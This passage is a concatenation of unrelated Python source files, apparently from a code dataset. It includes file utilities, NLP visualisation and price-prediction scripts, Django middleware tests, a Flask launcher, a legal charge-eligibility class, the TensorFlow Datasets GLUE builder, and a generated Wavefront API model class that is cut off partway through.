count = property_('count', type_=int, writeable=True)
Also you could define which selector using before attribute.
The default one is '_'.
"""
def __init__(self, name: str, type_: t.Type[_T] = t.Any, prefix: str = '_',
writable: bool = False, delectable: bool = False) -> None:
"""
Args:
name (str): variable name.
_type (Type[_T], optional): type for type hinting. Defaults to Any.
prefix (str, optional): prefix before variable name. Defaults to '_'.
writable (bool, optional): if allowed write operation. Defaults to False.
delectable (bool, optional): if deletable. Defaults to False.
"""
self.__name, self.__prefix = name, prefix
self.__writeable, self.__deletable = writable, delectable
def __gen_prefix(self, obj) -> str:
prefix = self.__prefix
if prefix.startswith('__'):
prefix = '_' + type(obj).__name__ + prefix
return prefix
def __get__(self, obj, _objtype) -> _T:
return getattr(obj, self.__gen_prefix(obj) + self.__name)
def __set__(self, obj, data: _T) -> None:
if self.__writeable:
setattr(obj, self.__gen_prefix(obj) + self.__name, data)
def __delete__(self, obj) -> None:
if self.__deletable:
delattr(obj, self.__gen_prefix(obj) + self.__name)
def listdir(path: str, excludes: t.Container[str] = None) -> t.Iterator[str]:
"""
List all dir inside specific path.
Args:
path (str): path to be explore.
excludes (Container[str], optional): dirname to exclude. Defaults to None.
Yields:
Iterator[str]: absolute path of subdirectories.
Raises:
FileNotFoundError: when given invalid ``path``.
"""
if excludes is None:
excludes=set()
for itemname in os.listdir(path.strip('\\')):
fullname = os.path.join(path, itemname)
if os.path.isdir(fullname) and not itemname in excludes:
yield os.path.abspath(fullname)
def rmdir(path: str) -> None:
"""Remove dir and file inside it.
Args:
path (str): absolute dir gonna remove.
Raises:
FileNotFoundError: when ``path`` not exists.
"""
if not os.path.isdir(path):
raise FileNotFoundError()
shutil.rmtree(path, ignore_errors=False)
def startstrip(string: str, part: str) -> str:
"""
Remove ``part`` from beginning of ``string`` if ``string`` startswith ``part``.
Args:
string (str): source string.
part (str): removing part.
Returns:
str: removed part.
"""
if string.startswith(part):
return string[len(part):]
return string
|
python
|
"""
In this module are stored the main Neural Networks Architectures.
"""
from .base_architectures import (BaseDecoder, BaseDiscriminator, BaseEncoder,
BaseMetric)
__all__ = ["BaseDecoder", "BaseEncoder", "BaseMetric", "BaseDiscriminator"]
|
python
|
"""kernels tests."""
|
python
|
nome = str(input('Digite seu nome completo: ')).strip()
n = nome.split()
print(f"Seu primeiro nome é: {n[0]}")
print(f"Seu último nome é {n[len(n)-1]}")
|
python
|
#!/usr/bin/env python3
from matplotlib import pyplot as plt
from nltk.tokenize import word_tokenize
from classify import load_data
from features import FeatureExtractor
import pandas as pd
import numpy as np
def visualize_class_balance(data_path, classes):
class_counts = {c: 0 for c in classes}
for c in classes:
filename = data_path + '.' + c
with open(filename) as file_:
for i, _ in enumerate(file_):
pass
class_counts[c] = i+1
total = sum(class_counts.values()) * 1.0
class_freqs = [(class_counts[c]/total)*100 for c in classes]
freqs_str = ['{:.2f}%'.format(f) for f in class_freqs]
plt.pie(class_freqs, labels=freqs_str)
plt.legend(classes)
plt.show()
def visualize_tags(data_path, classes):
sents, labels, ids = load_data(data_path)
feats = FeatureExtractor(bow=False, negation=False,
emoji=False, senti_words=False,
emoticon=False, postag=True,
verbose=False)
feats.make_bow(sents)
tags = feats.get_representation(sents)
df = pd.DataFrame(tags, index=ids,
columns=['N', 'ADV', 'ADJ', 'V'])
df['label'] = [classes[l] for l in labels]
counts = df.groupby('label').sum()
counts = counts.div(counts.sum(axis=1), axis=0)
counts *= 100
counts.plot.bar(rot=0)
plt.xlabel('Class')
plt.ylabel('Frequency of PoS tag (%)')
plt.show()
def visualize_polarities(data_path, classes, lexicon_path):
lexicon = pd.read_csv(lexicon_path, names=['word', 'sentiment'])
negative_words = lexicon.loc[lexicon['sentiment'] == -1, 'word']
neutral_words = lexicon.loc[lexicon['sentiment'] == 0, 'word']
positive_words = lexicon.loc[lexicon['sentiment'] == 1, 'word']
sents, labels, ids = load_data(data_path)
polarity_counts = pd.DataFrame(0, index=['negative', 'neutral', 'positive', 'total'],
columns=classes)
for i, sent in enumerate(sents):
class_ = classes[labels[i]]
tokens = word_tokenize(sent, language='portuguese')
negative_count = len(set(tokens).intersection(set(negative_words)))
neutral_count = len(set(tokens).intersection(set(neutral_words)))
positive_count = len(set(tokens).intersection(set(positive_words)))
polarity_counts.loc['negative', class_] += negative_count
polarity_counts.loc['neutral', class_] += neutral_count
polarity_counts.loc['positive', class_] += positive_count
polarity_counts.loc['total', class_] += len(tokens)
polarity_rates = polarity_counts.div(polarity_counts.loc['total', :])
polarity_rates *= 100
polarity_rates.loc[polarity_rates.index != 'total', :].T.plot.bar(rot=0)
plt.xlabel('Class')
plt.ylabel('Rate of polarity words (%)')
plt.show()
def visualize_sentence_length(data_path, classes):
sents, labels, ids = load_data(data_path)
lengths = pd.DataFrame(index=ids,
columns=['label', 'length'])
for i, sent in enumerate(sents):
class_ = classes[labels[i]]
lengths.loc[ids[i], 'label'] = class_
tokens = word_tokenize(sent, language='portuguese')
sent_len = len(tokens)
lengths.loc[ids[i], 'length'] = sent_len
lengths.boxplot(column='length', by='label')
plt.title('')
plt.suptitle('')
plt.xlabel('Class')
plt.ylabel('Sentence length (tokens)')
plt.show()
def main():
data_path = 'data/corpus/trainTT'
lexicon_path = 'data/resources/sentilex-reduzido.txt'
classes = ['neg', 'neu', 'pos']
visualize_class_balance(data_path, classes)
visualize_tags(data_path, classes)
visualize_polarities(data_path, classes, lexicon_path)
visualize_sentence_length(data_path, classes)
if __name__ == "__main__":
main()
|
python
|
from lib.userInterface import userInterface
if __name__ == '__main__':
ui = userInterface()
if ui.yesNoQuery("Input from file? [y/n]"):
path = input("Please input path of your file: ")
ui.fileInput(path)
else:
ui.userInput()
ui.quantize().predict()
print ("The predicted price is : %f\n" % ui.getPredictedPrice())
if ui.yesNoQuery("Print regression report? [y/n]"):
ui.printReport()
|
python
|
from django.core.urlresolvers import reverse
from nose.tools import eq_
from mozillians.common.tests import TestCase
from mozillians.groups.tests import GroupFactory
from mozillians.users.tests import UserFactory
class OldGroupRedirectionMiddlewareTests(TestCase):
def setUp(self):
self.user = UserFactory.create()
def test_valid_name(self):
"""Valid group with name that matches the old group regex doens't redirect."""
group = GroupFactory.create(name='111-foo')
GroupFactory.create(name='foo')
url = reverse('groups:show_group', kwargs={'url': group.url})
with self.login(self.user) as client:
response = client.get(url, follow=True)
eq_(response.status_code, 200)
eq_(response.context['group'], group)
def test_old_group_url_redirects(self):
group = GroupFactory.create()
url = '/group/111-{0}/'.format(group.url)
with self.login(self.user) as client:
response = client.get(url, follow=True)
eq_(response.status_code, 200)
eq_(response.context['group'], group)
def test_not_existing_group_404s(self):
url = '/group/111-invalid/'
with self.login(self.user) as client:
response = client.get(url, follow=True)
eq_(response.status_code, 404)
|
python
|
import os
hosturl = os.environ.get('HOSTURL')
from lightserv import create_app
from lightserv.config import DevConfig,ProdConfig
import socket
flask_mode = os.environ['FLASK_MODE']
if flask_mode == 'PROD':
app = create_app(ProdConfig)
elif flask_mode == 'DEV':
app = create_app(DevConfig)
if __name__ == '__main__':
import logging
logger = logging.getLogger('werkzeug')
formatter = logging.Formatter('%(asctime)s:%(name)s:%(message)s')
''' Make the file handler to deal with logging to file '''
file_handler = logging.FileHandler('logs/app_debug.log')
file_handler.setFormatter(formatter)
stream_handler = logging.StreamHandler() # level already set at debug from logger.setLevel() above
stream_handler.setFormatter(formatter)
logger.addHandler(stream_handler)
logger.addHandler(file_handler)
if flask_mode == 'DEV':
app.run(host='0.0.0.0',port='5000',debug=True) # 5000 inside the container
elif flask_mode == 'PROD':
app.run(host='0.0.0.0',port='5000',debug=False) # 5000 inside the container
|
python
|
from dataclasses import dataclass
from expungeservice.models.charge import ChargeType
from expungeservice.models.charge import ChargeUtil
from expungeservice.models.expungement_result import TypeEligibility, EligibilityStatus
@dataclass(frozen=True)
class SevereCharge(ChargeType):
type_name: str = "Severe Charge"
expungement_rules: str = (
"""Charges that are harsher than Class A Felonies in severity: namely, murder and treason."""
)
def type_eligibility(self, disposition):
if ChargeUtil.dismissed(disposition):
raise ValueError("Dismissed criminal charges should have been caught by another class.")
elif ChargeUtil.convicted(disposition):
return TypeEligibility(EligibilityStatus.INELIGIBLE, reason="Ineligible by omission from statute")
|
python
|
# coding=utf-8
# Copyright 2021 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The General Language Understanding Evaluation (GLUE) benchmark."""
import csv
import os
import textwrap
import numpy as np
import six
import tensorflow.compat.v2 as tf
import tensorflow_datasets.public_api as tfds
_GLUE_CITATION = """\
@inproceedings{wang2019glue,
title={{GLUE}: A Multi-Task Benchmark and Analysis Platform for Natural Language Understanding},
author={Wang, Alex and Singh, Amanpreet and Michael, Julian and Hill, Felix and Levy, Omer and Bowman, Samuel R.},
note={In the Proceedings of ICLR.},
year={2019}
}
Note that each GLUE dataset has its own citation. Please see the source to see
the correct citation for each contained dataset."""
_GLUE_DESCRIPTION = """\
GLUE, the General Language Understanding Evaluation benchmark
(https://gluebenchmark.com/) is a collection of resources for training,
evaluating, and analyzing natural language understanding systems.
"""
_MRPC_DEV_IDS = "https://firebasestorage.googleapis.com/v0/b/mtl-sentence-representations.appspot.com/o/data%2Fmrpc_dev_ids.tsv?alt=media&token=ec5c0836-31d5-48f4-b431-7480817f1adc"
_MRPC_TRAIN = "https://dl.fbaipublicfiles.com/senteval/senteval_data/msr_paraphrase_train.txt"
_MRPC_TEST = "https://dl.fbaipublicfiles.com/senteval/senteval_data/msr_paraphrase_test.txt"
_MNLI_BASE_KWARGS = dict(
text_features={
"premise": "sentence1",
"hypothesis": "sentence2",
},
label_classes=["entailment", "neutral", "contradiction"],
label_column="gold_label",
data_url="https://dl.fbaipublicfiles.com/glue/data/MNLI.zip",
data_dir="MNLI",
citation=textwrap.dedent("""\
@InProceedings{N18-1101,
author = "Williams, Adina
and Nangia, Nikita
and Bowman, Samuel",
title = "A Broad-Coverage Challenge Corpus for
Sentence Understanding through Inference",
booktitle = "Proceedings of the 2018 Conference of
the North American Chapter of the
Association for Computational Linguistics:
Human Language Technologies, Volume 1 (Long
Papers)",
year = "2018",
publisher = "Association for Computational Linguistics",
pages = "1112--1122",
location = "New Orleans, Louisiana",
url = "http://aclweb.org/anthology/N18-1101"
}
@article{bowman2015large,
title={A large annotated corpus for learning natural language inference},
author={Bowman, Samuel R and Angeli, Gabor and Potts, Christopher and Manning, Christopher D},
journal={arXiv preprint arXiv:1508.05326},
year={2015}
}"""),
url="http://www.nyu.edu/projects/bowman/multinli/")
class GlueConfig(tfds.core.BuilderConfig):
"""BuilderConfig for GLUE."""
def __init__(self,
*,
text_features,
label_column,
data_url,
data_dir,
citation,
url,
label_classes=None,
process_label=lambda x: x,
**kwargs):
"""BuilderConfig for GLUE.
Args:
text_features: `dict[string, string]`, map from the name of the feature
dict for each text field to the name of the column in the tsv file
label_column: `string`, name of the column in the tsv file corresponding
to the label
data_url: `string`, url to download the zip file from
data_dir: `string`, the path to the folder containing the tsv files in the
downloaded zip
citation: `string`, citation for the data set
url: `string`, url for information about the data set
label_classes: `list[string]`, the list of classes if the label is
categorical. If not provided, then the label will be of type
`tf.float32`.
process_label: `Function[string, any]`, function taking in the raw value
of the label and processing it to the form required by the label feature
**kwargs: keyword arguments forwarded to super.
"""
super(GlueConfig, self).__init__(
version=tfds.core.Version("1.0.0"),
release_notes={
"1.0.0": "New split API (https://tensorflow.org/datasets/splits)",
"1.0.1": "Update dead URL links.",
},
**kwargs)
self.text_features = text_features
self.label_column = label_column
self.label_classes = label_classes
self.data_url = data_url
self.data_dir = data_dir
self.citation = citation
self.url = url
self.process_label = process_label
class Glue(tfds.core.GeneratorBasedBuilder):
"""The General Language Understanding Evaluation (GLUE) benchmark."""
BUILDER_CONFIGS = [
GlueConfig(
name="cola",
description=textwrap.dedent("""\
The Corpus of Linguistic Acceptability consists of English
acceptability judgments drawn from books and journal articles on
linguistic theory. Each example is a sequence of words annotated
with whether it is a grammatical English sentence."""),
text_features={"sentence": "sentence"},
label_classes=["unacceptable", "acceptable"],
label_column="is_acceptable",
data_url="https://dl.fbaipublicfiles.com/glue/data/CoLA.zip",
data_dir="CoLA",
citation=textwrap.dedent("""\
@article{warstadt2018neural,
title={Neural Network Acceptability Judgments},
author={Warstadt, Alex and Singh, Amanpreet and Bowman, Samuel R},
journal={arXiv preprint arXiv:1805.12471},
year={2018}
}"""),
url="https://nyu-mll.github.io/CoLA/"),
GlueConfig(
name="sst2",
description=textwrap.dedent("""\
The Stanford Sentiment Treebank consists of sentences from movie reviews and
human annotations of their sentiment. The task is to predict the sentiment of a
given sentence. We use the two-way (positive/negative) class split, and use only
sentence-level labels."""),
text_features={"sentence": "sentence"},
label_classes=["negative", "positive"],
label_column="label",
data_url="https://dl.fbaipublicfiles.com/glue/data/SST-2.zip",
data_dir="SST-2",
citation=textwrap.dedent("""\
@inproceedings{socher2013recursive,
title={Recursive deep models for semantic compositionality over a sentiment treebank},
author={Socher, Richard and Perelygin, Alex and Wu, Jean and Chuang, Jason and Manning, Christopher D and Ng, Andrew and Potts, Christopher},
booktitle={Proceedings of the 2013 conference on empirical methods in natural language processing},
pages={1631--1642},
year={2013}
}"""),
url="https://nlp.stanford.edu/sentiment/index.html"),
GlueConfig(
name="mrpc",
description=textwrap.dedent("""\
The Microsoft Research Paraphrase Corpus (Dolan & Brockett, 2005) is a corpus of
sentence pairs automatically extracted from online news sources, with human annotations
for whether the sentences in the pair are semantically equivalent."""), # pylint: disable=line-too-long
text_features={
"sentence1": "",
"sentence2": ""
},
label_classes=["not_equivalent", "equivalent"],
label_column="Quality",
data_url="", # MRPC isn't hosted by GLUE.
data_dir="MRPC",
citation=textwrap.dedent("""\
@inproceedings{dolan2005automatically,
title={Automatically constructing a corpus of sentential paraphrases},
author={Dolan, William B and Brockett, Chris},
booktitle={Proceedings of the Third International Workshop on Paraphrasing (IWP2005)},
year={2005}
}"""),
url="https://www.microsoft.com/en-us/download/details.aspx?id=52398"
),
GlueConfig(
name="qqp",
description=textwrap.dedent("""\
The Quora Question Pairs2 dataset is a collection of question pairs from the
community question-answering website Quora. The task is to determine whether a
pair of questions are semantically equivalent."""),
text_features={
"question1": "question1",
"question2": "question2",
},
label_classes=["not_duplicate", "duplicate"],
label_column="is_duplicate",
data_url="https://dl.fbaipublicfiles.com/glue/data/QQP.zip",
data_dir="QQP",
citation=textwrap.dedent("""\
@online{WinNT,
author = {Iyer, Shankar and Dandekar, Nikhil and Csernai, Kornel},
title = {First Quora Dataset Release: Question Pairs},
year = 2017,
url = {https://data.quora.com/First-Quora-Dataset-Release-Question-Pairs},
urldate = {2019-04-03}
}"""),
url="https://data.quora.com/First-Quora-Dataset-Release-Question-Pairs"
),
GlueConfig(
name="stsb",
description=textwrap.dedent("""\
The Semantic Textual Similarity Benchmark (Cer et al., 2017) is a collection of
sentence pairs drawn from news headlines, video and image captions, and natural
language inference data. Each pair is human-annotated with a similarity score
from 1 to 5."""),
text_features={
"sentence1": "sentence1",
"sentence2": "sentence2",
},
label_column="score",
data_url="https://dl.fbaipublicfiles.com/glue/data/STS-B.zip",
data_dir="STS-B",
citation=textwrap.dedent("""\
@article{cer2017semeval,
title={Semeval-2017 task 1: Semantic textual similarity-multilingual and cross-lingual focused evaluation},
author={Cer, Daniel and Diab, Mona and Agirre, Eneko and Lopez-Gazpio, Inigo and Specia, Lucia},
journal={arXiv preprint arXiv:1708.00055},
year={2017}
}"""),
url="http://ixa2.si.ehu.es/stswiki/index.php/STSbenchmark",
process_label=np.float32),
GlueConfig(
name="mnli",
description=textwrap.dedent("""\
The Multi-Genre Natural Language Inference Corpus is a crowdsourced
collection of sentence pairs with textual entailment annotations. Given a premise sentence
and a hypothesis sentence, the task is to predict whether the premise entails the hypothesis
(entailment), contradicts the hypothesis (contradiction), or neither (neutral). The premise sentences are
gathered from ten different sources, including transcribed speech, fiction, and government reports.
We use the standard test set, for which we obtained private labels from the authors, and evaluate
on both the matched (in-domain) and mismatched (cross-domain) section. We also use and recommend
the SNLI corpus as 550k examples of auxiliary training data."""),
**_MNLI_BASE_KWARGS),
GlueConfig(
name="mnli_mismatched",
description=textwrap.dedent("""\
The mismatched validation and test splits from MNLI.
See the "mnli" BuilderConfig for additional information."""),
**_MNLI_BASE_KWARGS),
GlueConfig(
name="mnli_matched",
description=textwrap.dedent("""\
The matched validation and test splits from MNLI.
See the "mnli" BuilderConfig for additional information."""),
**_MNLI_BASE_KWARGS),
GlueConfig(
name="qnli",
description=textwrap.dedent("""\
The Stanford Question Answering Dataset is a question-answering
dataset consisting of question-paragraph pairs, where one of the sentences in the paragraph (drawn
from Wikipedia) contains the answer to the corresponding question (written by an annotator). We
convert the task into sentence pair classification by forming a pair between each question and each
sentence in the corresponding context, and filtering out pairs with low lexical overlap between the
question and the context sentence. The task is to determine whether the context sentence contains
the answer to the question. This modified version of the original task removes the requirement that
the model select the exact answer, but also removes the simplifying assumptions that the answer
is always present in the input and that lexical overlap is a reliable cue."""), # pylint: disable=line-too-long
text_features={
"question": "question",
"sentence": "sentence",
},
label_classes=["entailment", "not_entailment"],
label_column="label",
data_url="https://dl.fbaipublicfiles.com/glue/data/QNLIv2.zip",
data_dir="QNLI",
citation=textwrap.dedent("""\
@article{rajpurkar2016squad,
title={Squad: 100,000+ questions for machine comprehension of text},
author={Rajpurkar, Pranav and Zhang, Jian and Lopyrev, Konstantin and Liang, Percy},
journal={arXiv preprint arXiv:1606.05250},
year={2016}
}"""),
url="https://rajpurkar.github.io/SQuAD-explorer/"),
GlueConfig(
name="rte",
description=textwrap.dedent("""\
The Recognizing Textual Entailment (RTE) datasets come from a series of annual textual
entailment challenges. We combine the data from RTE1 (Dagan et al., 2006), RTE2 (Bar Haim
et al., 2006), RTE3 (Giampiccolo et al., 2007), and RTE5 (Bentivogli et al., 2009).4 Examples are
constructed based on news and Wikipedia text. We convert all datasets to a two-class split, where
for three-class datasets we collapse neutral and contradiction into not entailment, for consistency."""), # pylint: disable=line-too-long
text_features={
"sentence1": "sentence1",
"sentence2": "sentence2",
},
label_classes=["entailment", "not_entailment"],
label_column="label",
data_url="https://dl.fbaipublicfiles.com/glue/data/RTE.zip",
data_dir="RTE",
citation=textwrap.dedent("""\
@inproceedings{dagan2005pascal,
title={The PASCAL recognising textual entailment challenge},
author={Dagan, Ido and Glickman, Oren and Magnini, Bernardo},
booktitle={Machine Learning Challenges Workshop},
pages={177--190},
year={2005},
organization={Springer}
}
@inproceedings{bar2006second,
title={The second pascal recognising textual entailment challenge},
author={Bar-Haim, Roy and Dagan, Ido and Dolan, Bill and Ferro, Lisa and Giampiccolo, Danilo and Magnini, Bernardo and Szpektor, Idan},
booktitle={Proceedings of the second PASCAL challenges workshop on recognising textual entailment},
volume={6},
number={1},
pages={6--4},
year={2006},
organization={Venice}
}
@inproceedings{giampiccolo2007third,
title={The third pascal recognizing textual entailment challenge},
author={Giampiccolo, Danilo and Magnini, Bernardo and Dagan, Ido and Dolan, Bill},
booktitle={Proceedings of the ACL-PASCAL workshop on textual entailment and paraphrasing},
pages={1--9},
year={2007},
organization={Association for Computational Linguistics}
}
@inproceedings{bentivogli2009fifth,
title={The Fifth PASCAL Recognizing Textual Entailment Challenge.},
author={Bentivogli, Luisa and Clark, Peter and Dagan, Ido and Giampiccolo, Danilo},
booktitle={TAC},
year={2009}
}"""),
url="https://aclweb.org/aclwiki/Recognizing_Textual_Entailment"
),
GlueConfig(
name="wnli",
description=textwrap.dedent("""\
The Winograd Schema Challenge (Levesque et al., 2011) is a reading comprehension task
in which a system must read a sentence with a pronoun and select the referent of that pronoun from
a list of choices. The examples are manually constructed to foil simple statistical methods: Each
one is contingent on contextual information provided by a single word or phrase in the sentence.
To convert the problem into sentence pair classification, we construct sentence pairs by replacing
the ambiguous pronoun with each possible referent. The task is to predict if the sentence with the
pronoun substituted is entailed by the original sentence. We use a small evaluation set consisting of
new examples derived from fiction books that was shared privately by the authors of the original
corpus. While the included training set is balanced between two classes, the test set is imbalanced
between them (65% not entailment). Also, due to a data quirk, the development set is adversarial:
hypotheses are sometimes shared between training and development examples, so if a model memorizes the
training examples, they will predict the wrong label on corresponding development set
example. As with QNLI, each example is evaluated separately, so there is not a systematic correspondence
between a model's score on this task and its score on the unconverted original task. We
call converted dataset WNLI (Winograd NLI)."""),
text_features={
"sentence1": "sentence1",
"sentence2": "sentence2",
},
label_classes=["not_entailment", "entailment"],
label_column="label",
data_url="https://dl.fbaipublicfiles.com/glue/data/WNLI.zip",
data_dir="WNLI",
citation=textwrap.dedent("""\
@inproceedings{levesque2012winograd,
title={The winograd schema challenge},
author={Levesque, Hector and Davis, Ernest and Morgenstern, Leora},
booktitle={Thirteenth International Conference on the Principles of Knowledge Representation and Reasoning},
year={2012}
}"""),
url="https://cs.nyu.edu/faculty/davise/papers/WinogradSchemas/WS.html"
),
GlueConfig(
name="ax",
description=textwrap.dedent("""\
A manually-curated evaluation dataset for fine-grained analysis of
system performance on a broad range of linguistic phenomena. This
dataset evaluates sentence understanding through Natural Language
Inference (NLI) problems. Use a model trained on MulitNLI to produce
predictions for this dataset."""),
text_features={
"premise": "sentence1",
"hypothesis": "sentence2",
},
label_classes=["entailment", "neutral", "contradiction"],
label_column="", # No label since we only have test set.
# We must use a URL shortener since the URL from GLUE is very long and
# causes issues in TFDS.
data_url="https://bit.ly/2BOtOJ7",
data_dir="", # We are downloading a tsv.
citation="", # The GLUE citation is sufficient.
url="https://gluebenchmark.com/diagnostics"),
]
def _info(self):
features = {
text_feature: tfds.features.Text()
for text_feature in six.iterkeys(self.builder_config.text_features)
}
if self.builder_config.label_classes:
features["label"] = tfds.features.ClassLabel(
names=self.builder_config.label_classes)
else:
features["label"] = tf.float32
features["idx"] = tf.int32
return tfds.core.DatasetInfo(
builder=self,
description=_GLUE_DESCRIPTION,
features=tfds.features.FeaturesDict(features),
homepage=self.builder_config.url,
citation=self.builder_config.citation + "\n" + _GLUE_CITATION,
)
def _split_generators(self, dl_manager):
if self.builder_config.name == "ax":
data_file = dl_manager.download(self.builder_config.data_url)
return [
tfds.core.SplitGenerator(
name=tfds.Split.TEST,
gen_kwargs={
"data_file": data_file,
"split": "test",
})
]
if self.builder_config.name == "mrpc":
data_dir = None
mrpc_files = dl_manager.download({
"dev_ids": _MRPC_DEV_IDS,
"train": _MRPC_TRAIN,
"test": _MRPC_TEST,
})
else:
dl_dir = dl_manager.download_and_extract(self.builder_config.data_url)
data_dir = os.path.join(dl_dir, self.builder_config.data_dir)
mrpc_files = None
train_split = tfds.core.SplitGenerator(
name=tfds.Split.TRAIN,
gen_kwargs={
"data_file": os.path.join(data_dir or "", "train.tsv"),
"split": "train",
"mrpc_files": mrpc_files,
})
if self.builder_config.name == "mnli":
return [
train_split,
_mnli_split_generator(
"validation_matched", data_dir, "dev", matched=True),
_mnli_split_generator(
"validation_mismatched", data_dir, "dev", matched=False),
_mnli_split_generator("test_matched", data_dir, "test", matched=True),
_mnli_split_generator(
"test_mismatched", data_dir, "test", matched=False)
]
elif self.builder_config.name == "mnli_matched":
return [
_mnli_split_generator("validation", data_dir, "dev", matched=True),
_mnli_split_generator("test", data_dir, "test", matched=True)
]
elif self.builder_config.name == "mnli_mismatched":
return [
_mnli_split_generator("validation", data_dir, "dev", matched=False),
_mnli_split_generator("test", data_dir, "test", matched=False)
]
else:
return [
train_split,
tfds.core.SplitGenerator(
name=tfds.Split.VALIDATION,
gen_kwargs={
"data_file": os.path.join(data_dir or "", "dev.tsv"),
"split": "dev",
"mrpc_files": mrpc_files,
}),
tfds.core.SplitGenerator(
name=tfds.Split.TEST,
gen_kwargs={
"data_file": os.path.join(data_dir or "", "test.tsv"),
"split": "test",
"mrpc_files": mrpc_files,
}),
]
def _generate_examples(self, data_file, split, mrpc_files=None):
if self.builder_config.name == "mrpc":
# We have to prepare the MRPC dataset from the original sources ourselves.
examples = self._generate_example_mrpc_files(
mrpc_files=mrpc_files, split=split)
for example in examples:
yield example["idx"], example
else:
process_label = self.builder_config.process_label
label_classes = self.builder_config.label_classes
# The train and dev files for CoLA are the only tsv files without a
# header.
is_cola_non_test = self.builder_config.name == "cola" and split != "test"
with tf.io.gfile.GFile(data_file) as f:
reader = csv.DictReader(f, delimiter="\t", quoting=csv.QUOTE_NONE)
if is_cola_non_test:
reader = csv.reader(f, delimiter="\t", quoting=csv.QUOTE_NONE)
for n, row in enumerate(reader):
if is_cola_non_test:
row = {
"sentence": row[3],
"is_acceptable": row[1],
}
example = {
feat: row[col]
for feat, col in six.iteritems(self.builder_config.text_features)
}
example["idx"] = n
if self.builder_config.label_column in row:
label = row[self.builder_config.label_column]
# For some tasks, the label is represented as 0 and 1 in the tsv
# files and needs to be cast to integer to work with the feature.
if label_classes and label not in label_classes:
label = int(label) if label else None
example["label"] = process_label(label)
else:
example["label"] = process_label(-1)
# Filter out corrupted rows.
for value in six.itervalues(example):
if value is None:
break
else:
yield example["idx"], example
def _generate_example_mrpc_files(self, mrpc_files, split):
if split == "test":
with tf.io.gfile.GFile(mrpc_files["test"]) as f:
reader = csv.DictReader(f, delimiter="\t", quoting=csv.QUOTE_NONE)
for n, row in enumerate(reader):
yield {
"sentence1": row["#1 String"],
"sentence2": row["#2 String"],
"label": -1,
"idx": n,
}
else:
with tf.io.gfile.GFile(mrpc_files["dev_ids"]) as f:
reader = csv.reader(f, delimiter="\t", quoting=csv.QUOTE_NONE)
dev_ids = [[row[0], row[1]] for row in reader]
with tf.io.gfile.GFile(mrpc_files["train"]) as f:
# The first 3 bytes are the utf-8 BOM \xef\xbb\xbf, which messes with
# the Quality key.
f.seek(3)
reader = csv.DictReader(f, delimiter="\t", quoting=csv.QUOTE_NONE)
for n, row in enumerate(reader):
is_row_in_dev = [row["#1 ID"], row["#2 ID"]] in dev_ids
if is_row_in_dev == (split == "dev"):
yield {
"sentence1": row["#1 String"],
"sentence2": row["#2 String"],
"label": int(row["Quality"]),
"idx": n,
}
def _mnli_split_generator(name, data_dir, split, matched):
return tfds.core.SplitGenerator(
name=name,
gen_kwargs={
"data_file": os.path.join(
data_dir,
"%s_%s.tsv" % (split, "matched" if matched else "mismatched")),
"split": split,
"mrpc_files": None,
})
|
python
|
# coding: utf-8
"""
Wavefront REST API Documentation
<p>The Wavefront REST API enables you to interact with Wavefront servers using standard REST API tools. You can use the REST API to automate commonly executed operations such as automatically tagging sources.</p><p>When you make REST API calls outside the Wavefront REST API documentation you must add the header \"Authorization: Bearer <<API-TOKEN>>\" to your HTTP requests.</p> # noqa: E501
OpenAPI spec version: v2
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from wavefront_api_client.configuration import Configuration
class SpecificData(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'class_loader': 'ClassLoader',
'conversions': 'list[ConversionObject]',
'fast_reader_builder': 'FastReaderBuilder',
'fast_reader_enabled': 'bool'
}
attribute_map = {
'class_loader': 'classLoader',
'conversions': 'conversions',
'fast_reader_builder': 'fastReaderBuilder',
'fast_reader_enabled': 'fastReaderEnabled'
}
def __init__(self, class_loader=None, conversions=None, fast_reader_builder=None, fast_reader_enabled=None, _configuration=None): # noqa: E501
"""SpecificData - a model defined in Swagger""" # noqa: E501
if _configuration is None:
_configuration = Configuration()
self._configuration = _configuration
self._class_loader = None
self._conversions = None
self._fast_reader_builder = None
self._fast_reader_enabled = None
self.discriminator = None
if class_loader is not None:
self.class_loader = class_loader
if conversions is not None:
self.conversions = conversions
if fast_reader_builder is not None:
self.fast_reader_builder = fast_reader_builder
if fast_reader_enabled is not None:
self.fast_reader_enabled = fast_reader_enabled
@property
def class_loader(self):
"""Gets the class_loader of this SpecificData. # noqa: E501
:return: The class_loader of this SpecificData. # noqa: E501
:rtype: ClassLoader
"""
return self._class_loader
@class_loader.setter
def class_loader(self, class_loader):
"""Sets the class_loader of this SpecificData.
:param class_loader: The class_loader of this SpecificData. # noqa: E501
:type: ClassLoader
"""
self._class_loader = class_loader
@property
def conversions(self):
"""Gets the conversions of this SpecificData. # noqa: E501
:return: The conversions of this SpecificData. # noqa: E501
:rtype: list[ConversionObject]
"""
return self._conversions
@conversions.setter
def conversions(self, conversions):
"""Sets the conversions of this SpecificData.
:param conversions: The conversions of this SpecificData. # noqa: E501
:type: list[ConversionObject]
"""
self._conversions = conversions
@property
def fast_reader_builder(self):
"""Gets the fast_reader_builder of this SpecificData. # noqa: E501
:return: The fast_reader_builder of this SpecificData. # noqa: E501
:rtype: FastReaderBuilder
"""
return self._fast_reader_builder
@fast_reader_builder.setter
def fast_reader_builder(self, fast_reader_builder):
"""Sets the fast_reader_builder of this SpecificData.
:param fast_reader_builder: The fast_reader_builder of this SpecificData. # noqa: E501
:type: FastReaderBuilder
"""
self._fast_reader_builder = fast_reader_builder
@property
def fast_reader_enabled(self):
"""Gets the fast_reader_enabled of this SpecificData. # noqa: E501
:return: The fast_reader_enabled of this SpecificData. # noqa: E501
:rtype: bool
"""
return self._fast_reader_enabled
@fast_reader_enabled.setter
def fast_reader_enabled(self, fast_reader_enabled):
"""Sets the fast_reader_enabled of this SpecificData.
:param fast_reader_enabled: The fast_reader_enabled of this SpecificData. # noqa: E501
:type: bool
"""
